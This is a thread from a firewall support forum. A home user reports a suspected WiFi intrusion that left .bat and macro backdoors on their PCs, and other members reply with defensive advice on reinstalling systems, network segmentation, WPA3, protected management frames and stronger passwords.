OPNSense Get Hacked

[nicholaswkc]

Dear all forumers, I been hacked by hackers where they connect to my home 2.4G wifi and embedded backdoor like .bat file (for simple connect to host) or macro enabled file into my word/excel file. 
I know it may sound ridicilously but it's true.

How to get rid of this situation.Any solution to it?
I installed Avast antivurs or MalwareBytes?

Any software that monitor my connection tot he outside world (Wireshark or better)?

[Patrick M. Hausen]

And how exactly is it your OPNsense that was hacked?

Solution: reinstall all affected systems. Make sure to apply all software updates. Don't use unsupported systems like e.g. Windows 10.

[nicholaswkc]

Hacked through 2.4G(WPA2) wifi and leave .bat file and embedded bat script into word file. I had discontinued of Win10 due to security reason.

Even my portable HD had backdoor in it. I just install clean on everything and siable USB storage also.

All my country mobile data is exposed to hackerable.

[Patrick M. Hausen]

Solution: change WiFi password, reinstall all affected systems. Make sure to apply all software updates. Don't use unsupported systems like e.g. Windows 10.

[meyergru]

1. What was hacked seems to be your Windows 11 PC, not OpnSense. Why? Because it does not even make sense to install a .bat file there. Which hacker in his right mind would try to install a payload for a Windows PC on a FreeBSD box?

2. How do you know what the way of intrusion was? "Hacked through 2.4G wifi" can mean anything. I would argue that you surfed the wrong websites and the infection was via a browser exploit.

Nothing of this is inherently linked to OpnSense, so the thread title is misleading. Unless, of course, you expect OpnSense to protect your end devices from OSI layer 8 problems... ;-)

[nicholaswkc]

1. What was hacked seems to be your Windows 11 PC, not OpnSense. Why? Because it does not even make sense to install a .bat file there. Which hacker in his right mind would try to install a payload for a Windows PC on a FreeBSD box?

2. How do you know what the way of intrusion was? "Hacked through 2.4G wifi" can mean anything. I would argue that you surfed the wrong websites and the infection was via a browser exploit.

Nothing of this is inherently linked to OpnSense, so the thread title is misleading. Unless, of course, you expect OpnSense to protect your end devices from OSI layer 8 problems... ;-)

1. All my countries Linux based system cannot browse website unless using VPN.
2. WIFI hacking is quite easily once you master it. They force you to disconnect and connect then the get the plain authentication.

My solution to this disable WIFI completely in my house network.

[nicholaswkc]

Can the OPNSense affected also if hacker got access to LAN?

[passeri]

That depends on your security setup for Opnsense. HTTP or HTTPS access? From which [v]LANs? Quality of pass word or phrase? 2FA? SSH access? Password or passkey for that? Much of that is discussed here.

You can also run a security audit.

[jonny5]

Can the OPNSense affected also if hacker got access to LAN?

Internal Firewall rules with separate zones/interfaces for Wifi/Client/DMZ/Core/etc. Would advise using VLANs if you can, otherwise subneting with /24s is a good idea.

From what I've read, you might also want to turn on MAC-Address filters on your WAPs and/or OPNSense's DHCP, good luck!

[nicholaswkc]

Can the OPNSense affected also if hacker got access to LAN?

Internal Firewall rules with separate zones/interfaces for Wifi/Client/DMZ/Core/etc. Would advise using VLANs if you can, otherwise subneting with /24s is a good idea.

From what I've read, you might also want to turn on MAC-Address filters on your WAPs and/or OPNSense's DHCP, good luck!

I have MAC filtering enabled. NO SSH and open ports. How to create VLAN or subnetting?

[falken]

Can the OPNSense affected also if hacker got access to LAN?

Internal Firewall rules with separate zones/interfaces for Wifi/Client/DMZ/Core/etc. Would advise using VLANs if you can, otherwise subneting with /24s is a good idea.

From what I've read, you might also want to turn on MAC-Address filters on your WAPs and/or OPNSense's DHCP, good luck!

I have MAC filtering enabled. NO SSH and open ports. How to create VLAN or subnetting?

That's a little more involved than a forum post (IMO anyway).  I would suggest reading through google, or maybe even asking an AI model for starting steps.
It is absolutely a wifi and configuration issue though.  OPNsense wont automatically protect you if someone can connect to your wifi, join your main LAN, and then communicate directly with the rest of your LAN devices on the same LAN/VLAN/subnet.  The MAC address filtering won't help much, as if it is happening in the way you described they can just spoof the MAC address they got from session they sniffed anyway.

Also, move to WPA3 if able. I understand you likely have legacy devices that do not support it though, so its not as easy as said.
See if you can enable PMF (Protected Management Frames): Enable 802.11w or Protected Management Frames (PMF) in your router settings to prevent attackers from deauthenticating your devices to force a re-handshake.  While not full proof, it does lower the attack vector.  Once again though, everything you have may not support it, so you will need to see what if anything breaks.

Edit: realistically, if that is the attack method, you have an extremely weak wifi password as well.  Upgrade to  a nice long random password.